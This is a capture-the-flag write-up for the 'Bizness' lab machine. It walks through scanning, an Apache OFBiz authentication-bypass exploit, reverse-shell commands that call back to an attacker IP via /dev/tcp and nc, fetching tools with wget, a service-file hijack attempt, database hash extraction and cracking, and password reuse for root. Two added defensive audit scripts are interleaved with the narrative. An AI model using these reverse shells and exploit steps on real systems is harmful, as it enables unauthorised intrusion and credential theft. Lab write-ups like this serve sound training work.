As always, we start with an nmap scan:
╭─ ~/ctf/htb/bizness
╰─❯ nmap -sC -sV 10.10.11.252
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-25 14:43 MSK
Nmap scan report for 10.10.11.252 (10.10.11.252)
Host is up (0.054s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
| 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
443/tcp open ssl/http nginx 1.18.0
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after: 2328-11-10T20:03:40
|_http-title: Did not follow redirect to https://bizness.htb/
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.38 seconds
I also ran it with -p-; no extra ports were found.
Let's add 10.10.11.252 bizness.htb to the hosts file.
Next, directory enumeration with ffuf:
╭─ ~/ctf/htb/bizness
╰─❯ ffuf -w /usr/share/dirbuster/directory-list-lowercase-2.3-medium.txt -ic -u http://bizness.htb/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://bizness.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/dirbuster/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
crack [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 53ms]
10 [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 53ms]
08 [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 53ms]
1 [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 52ms]
archives [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 55ms]
privacy [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 55ms]
serial [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 56ms]
2006 [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 56ms]
blog [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 56ms]
img [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 55ms]
...
Interesting: every path comes back as a 301 of the same size (169 bytes), i.e. all of them just redirect to the main page.
Let's filter out that response size with -fs 169:
╭─ ~/ctf/htb/bizness 17s
╰─❯ ffuf -w /usr/share/dirbuster/directory-list-lowercase-2.3-medium.txt -ic -u http://bizness.htb/FUZZ -fs 169
________________________________________________
:: Method : GET
:: URL : http://bizness.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/dirbuster/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 169
________________________________________________
Also let’s scan for subdomains:
╭─ ~
╰─❯ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://bizness.htb' -H "Host: FUZZ.bizness.tld" -fs 169
________________________________________________
:: Method : GET
:: URL : http://bizness.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.bizness.tld
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 169
________________________________________________
That found absolutely nothing. Note that the Host header in this command targets FUZZ.bizness.tld rather than FUZZ.bizness.htb, which would not match any virtual host named under bizness.htb anyway. Let's explore the web page.
First of all I check the source code. Nothing interesting.
At the bottom of the page we see some info:
**Powered by Apache OFBiz**
I've never heard of Apache OFBiz. Let's look it up.
Apache OFBiz is a suite of business applications flexible enough to be used across any industry. A common architecture allows developers to easily extend or enhance it to create custom features.
Interesting. Let's check it with searchsploit:
╭─ ~/ctf/htb/bizness 3m 53s
╰─❯ searchsploit ofbiz
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------- ---------------------------------
Apache OFBiz - Admin Creator | multiple/remote/12264.txt
Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/12330.txt
Apache OFBiz - Remote Execution (via SQL Execution) | multiple/remote/12263.txt
Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities | multiple/remote/38230.txt
Apache OFBiz 16.11.04 - XML External Entity Injection | java/webapps/45673.py
Apache OFBiz 16.11.05 - Cross-Site Scripting | multiple/webapps/45975.txt
Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover) | java/webapps/48408.txt
ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) | java/webapps/50178.sh
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
The RCE is the most interesting one. It targets 17.12.01, but we have no idea which version our machine runs.
Apache OFBiz 17.12.01, released in 2020-03-04, is the first release of the 17.12 series, that has been stabilized since December 2017.
That looks like quite an old version; I don't think this will work.
Searching the internet, I found CVE-2023-51467, which looks quite promising!
I found this exploit PoC on GitHub:
https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass
git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git
cd Apache-OFBiz-Authentication-Bypass
╭─ ~/ctf/htb/bizness/Apache-OFBiz-Authentication-Bypass master
╰─❯ python3 exploit.py --url http://bizness.htb/
[+] Scanning started...
[+] Apache OFBiz instance seems to be vulnerable.
That's good! Let's use --cmd with a reverse shell.
I use https://revshells.com/ to generate reverse shells.
Set up a listener in another terminal:
╭─ ~
╰─❯ nc -lvnp 4444
Listening on 0.0.0.0 4444
╭─ ~/ctf/htb/bizness/Apache-OFBiz-Authentication-Bypass master
╰─❯ python3 exploit.py --url http://bizness.htb/ --cmd "/bin/bash -i >& /dev/tcp/10.10.14.56/4444 0>&1"
[+] Generating payload...
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.
It didn't work!
Let's try uploading an nc executable to use for the reverse shell.
Stop the listener and start an HTTP server that hosts nc:
╭─ ~/ctf/htb/bizness
╰─❯ nc -lvnp 4444
Listening on 0.0.0.0 4444
^C
╭─ ~/ctf/htb/bizness ✘ INT
╰─❯ cp /usr/bin/nc ./
╭─ ~/ctf/htb/bizness
╰─❯ python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...
╭─ ~/ctf/htb/bizness/Apache-OFBiz-Authentication-Bypass master
╰─❯ python3 exploit.py --url https://bizness.htb/ --cmd "wget http://10.10.14.56:4444/nc"
[+] Generating payload...
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.
Looking at the HTTP server logs we see the GET request, so I assume it worked.
Now let's use nc to execute a reverse shell. (Note that the command below invokes nc by bare name, so it resolves through PATH rather than to the freshly downloaded file in the working directory, which would also still need chmod +x.)
Again we set up a listener:
╭─ ~/ctf/htb/bizness ✘ INT 4s
╰─❯ nc -lvnp 4444
Listening on 0.0.0.0 4444
╭─ ~/ctf/htb/bizness/Apache-OFBiz-Authentication-Bypass master
╰─❯ python3 exploit.py --url https://bizness.htb/ --cmd "nc 10.10.14.56 4444 -c /bin/sh"
[+] Generating payload...
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.
AND WE GOT A CONNECTION IN THE LISTENER!
Let's stabilize the shell:
python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo;fg
export TERM=xterm
Done. Now we have a stable shell.
ofbiz@bizness:/opt/ofbiz$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
ofbiz:x:1001:1001:,,,:/home/ofbiz:/bin/bash
So ofbiz is the only non-root user with a login shell!
ofbiz@bizness:/opt/ofbiz$ cd
ofbiz@bizness:~$ ls
user.txt
ofbiz@bizness:~$ cat user.txt
<REDACTED>
ofbiz@bizness:~$
Got the user flag!
I'm quite lazy (and tbh a noob), so let's use LinPEAS to search for privesc.
Set up an HTTP server hosting linpeas on your machine:
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
sudo python3 -m http.server
On the target:
wget http://10.10.14.56:8000/linpeas.sh
sh linpeas.sh
LinPEAS reported writable service files:
ofbiz@bizness:/opt/ofbiz$ cat /etc/systemd/system/multi-user.target.wants/ofbiz.service
# OFBiz service
[Unit]
Description=OFBiz Service
[Service]
Type=simple
# environment variables
Environment="JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64"
Environment="PATH=/usr/lib/jvm/java-11-openjdk-amd64/bin:/bin:/sbin:/usr/bin:/usr/sbin"
User=ofbiz
WorkingDirectory=/opt/ofbiz
# start and stop executables
# note that systemd requires specifying full/absolute path to executables
ExecStart=/opt/ofbiz/gradlew ofbiz
ExecStop=/opt/ofbiz/gradlew "ofbiz --shutdown"
Restart=Always
RestartSec=10s
RemainAfterExit=no
[Install]
WantedBy=multi-user.target
Let's set up a listener:
nc -lvnp 4445
On the target:
echo 'nc 10.10.14.56 4445 -c /bin/sh' > /opt/ofbiz/gradlew
Sadly it didn't work, because the service was never re-run: ExecStart is only executed when the unit (re)starts, and nothing on the box re-ran it for us.
LinPEAS also listed database files in /opt/ofbiz/runtime/data/derby.
Let's search for something in the database.
Let's concatenate all the data files into one for easier searching:
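The underlying weakness here is a unit that runs as User=ofbiz while its ExecStart target, /opt/ofbiz/gradlew, lives in a tree that the same ofbiz account owns: whoever compromises the service account can rewrite what systemd will launch next time the unit starts. As a defender-side check for that pattern, here is an added audit script. It is my example, not code from the writeup or from LinPEAS; it assumes plain systemd unit files (a User= line and an ExecStart= line whose first word is the executable path) and GNU/BSD find with -L and symbolic -perm support.

```shell
#!/bin/sh
# Added audit example (not from the writeup): flag systemd units whose ExecStart
# executable, or the directory holding it, can be altered by the unit's own
# service account. That is exactly the ofbiz.service pattern above.

unit_field() {  # unit_field <unit file> <Key>  -> value of the first "Key=" line
    sed -n "s/^$2=//p" "$1" | head -n 1
}

exec_path() {  # executable named by ExecStart=, minus systemd's -, @, +, ! prefixes
    unit_field "$1" ExecStart | sed 's/^[-@+!]*//' | awk '{print $1}' | tr -d '"'
}

# check_unit <unit file>: prints one verdict line.
# Returns 0 (ok), 1 (flagged), 2 (skipped: ExecStart target not on disk).
check_unit() {
    unit=$1
    user=$(unit_field "$unit" User)
    [ -z "$user" ] && user=root          # systemd default when User= is absent
    bin=$(exec_path "$unit")
    if [ -z "$bin" ] || [ ! -f "$bin" ]; then
        echo "SKIP  $unit: ExecStart target '$bin' not found"
        return 2
    fi
    dir=$(dirname "$bin")
    reasons=""
    # find -L follows symlinks, so the real file is judged, not the link entry.
    # Ownership only matters for a non-root service account: root can do anything anyway.
    if [ "$user" != root ]; then
        [ -n "$(find -L "$bin" -user "$user" -print 2>/dev/null)" ] && reasons="$reasons file-owned-by-$user"
        [ -n "$(find -L "$dir" -prune -user "$user" -print 2>/dev/null)" ] && reasons="$reasons dir-owned-by-$user"
    fi
    [ -n "$(find -L "$bin" -perm -g=w -print 2>/dev/null)" ] && reasons="$reasons file-group-writable"
    [ -n "$(find -L "$bin" -perm -o=w -print 2>/dev/null)" ] && reasons="$reasons file-world-writable"
    [ -n "$(find -L "$dir" -prune -perm -o=w -print 2>/dev/null)" ] && reasons="$reasons dir-world-writable"
    if [ -n "$reasons" ]; then
        echo "FLAG  $unit: User=$user can alter ExecStart $bin:$reasons"
        return 1
    fi
    echo "OK    $unit: $bin is not modifiable by $user"
    return 0
}

# audit_units <dir>: run check_unit over every *.service file below <dir>,
# e.g. audit_units /etc/systemd/system
audit_units() {
    find -L "$1" -name '*.service' -type f 2>/dev/null | while read -r u; do
        check_unit "$u"
    done
}
```

Run it as audit_units /etc/systemd/system on a host you administer; any FLAG line is a unit to fix, either by moving the launcher to a root-owned, non-writable location or by dropping the service account's write access to it. The script reports only; it does not modify anything.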
cat /opt/ofbiz/runtime/data/derby/ofbiz/seg0/* > /opt/ofbiz/all-texts.txt
ofbiz@bizness:/opt/ofbiz$ strings all-texts.txt | grep SHA
SHA-256
MARSHALL ISLANDS
SHAREHOLDER
SHAREHOLDER
<eeval-UserLogin createdStamp="2023-12-16 03:40:23.643" createdTxStamp="2023-12-16 03:40:23.445" currentPassword="$SHA$REDACTED" enabled="Y" hasLoggedOut="N" lastUpdatedStamp="2023-12-16 03:44:54.272" lastUpdatedTxStamp="2023-12-16 03:44:54.213" requirePasswordChange="N" userLoginId="admin"/>
"$SHA$REDACTED
ofbiz@bizness:/opt/ofbiz$
$SHA$REDACTED
This looks like a salted SHA-1 password hash (OFBiz's $SHA$ prefix; "SHA" is Java's name for SHA-1), not an encrypted password.
I found this cracker:
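The dump line above is an OFBiz UserLogin record, and the interesting part for a defender is not the digest itself but what the record says about the account: which hash algorithm protects it, how long the salt is, and whether a default account like admin is still enabled. Here is an added Python audit over lines in that shape. It is my example, not code from the writeup or from the cracker linked below; the sample lines and every hash value in them are constructed, and the hash layout it parses, $<digest name>$<salt>$<base64url digest>, is what I know OFBiz's HashCrypt class produces.

```python
import re
from dataclasses import dataclass, field

# Constructed sample lines in the shape of what `strings` printed from the Derby
# segment files: one OFBiz UserLogin entity per line. Hash values are made up.
SAMPLE_LINES = [
    '<eeval-UserLogin createdStamp="2023-12-16 03:40:23.643" currentPassword="$SHA$d$EXAMPLEdigestEXAMPLEdigest01" '
    'enabled="Y" hasLoggedOut="N" requirePasswordChange="N" userLoginId="admin"/>',
    '<eeval-UserLogin currentPassword="$SHA-512$1a2b3c4d5e6f$EXAMPLEdigestEXAMPLE" enabled="Y" userLoginId="ops"/>',
    '<eeval-UserLogin currentPassword="$SHA$d$EXAMPLEdigest" enabled="N" userLoginId="old"/>',
    'SHAREHOLDER',  # unrelated `strings` hit, must be ignored
]

ATTR_RE = re.compile(r'(\w+)="([^"]*)"')
# OFBiz HashCrypt layout: $<MessageDigest name>$<salt>$<base64url digest>
HASH_RE = re.compile(r'^\$([^$]+)\$([^$]*)\$([^$]+)$')
WEAK_DIGESTS = {"SHA", "SHA1", "SHA-1", "MD5"}  # "SHA" is Java's alias for SHA-1
MIN_SALT_CHARS = 8  # assumed policy threshold for this example


@dataclass
class Finding:
    user: str
    digest: str
    salt_len: int
    enabled: bool
    issues: list = field(default_factory=list)


def parse_user_login(line):
    """Return the attribute dict of an <eeval-UserLogin .../> line, else None."""
    if not line.lstrip().startswith("<eeval-UserLogin"):
        return None
    return dict(ATTR_RE.findall(line))


def audit_user_login(attrs):
    """Classify one UserLogin record; the digest value itself is never used."""
    user = attrs.get("userLoginId", "?")
    enabled = attrs.get("enabled") == "Y"
    m = HASH_RE.match(attrs.get("currentPassword", ""))
    if m is None:
        return Finding(user, "unknown", 0, enabled, ["unrecognised-hash-format"])
    digest, salt, _ = m.groups()
    issues = []
    if digest.upper() in WEAK_DIGESTS:
        issues.append(f"weak-digest:{digest}")
    if len(salt) < MIN_SALT_CHARS:
        issues.append(f"short-salt:{len(salt)}")
    if user == "admin" and enabled:
        issues.append("default-admin-enabled")
    return Finding(user, digest, len(salt), enabled, issues)


def audit_dump(lines):
    """Run the audit over every UserLogin line found in an iterable of strings."""
    return [audit_user_login(a) for a in map(parse_user_login, lines) if a]


if __name__ == "__main__":
    for finding in audit_dump(SAMPLE_LINES):
        print(finding)
```

Feed it the output of strings over the Derby segment files (or any entity export) and every account with a weak-digest or short-salt issue is one whose password will fall to a wordlist attack exactly as shown below; to my knowledge the algorithm is chosen by password.encrypt.hash.type in OFBiz's security.properties, which defaults to SHA.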
https://github.com/duck-sec/Apache-OFBiz-SHA1-Cracker
On our machine:
git clone https://github.com/duck-sec/Apache-OFBiz-SHA1-Cracker.git
cd Apache-OFBiz-SHA1-Cracker
╭─ ~/ctf/htb/bizness/Apache-OFBiz-SHA1-Cracker master
╰─❯ python3 OFBiz-crack.py --hash-string '$SHA$REDACTED' --wordlist /usr/share/wordlists/rockyou.txt
[+] Attempting to crack....
Found Password: REDACTED
hash: $SHA$REDACTED
(Attempts: 1478437)
[!] Super, I bet you could log into something with that!
Let's try that password against root:
ofbiz@bizness:/opt/ofbiz$ su root
Password:
root@bizness:/opt/ofbiz# cat /root/root.txt
<REDACTED>
root@bizness:/opt/ofbiz#
We got all the flags!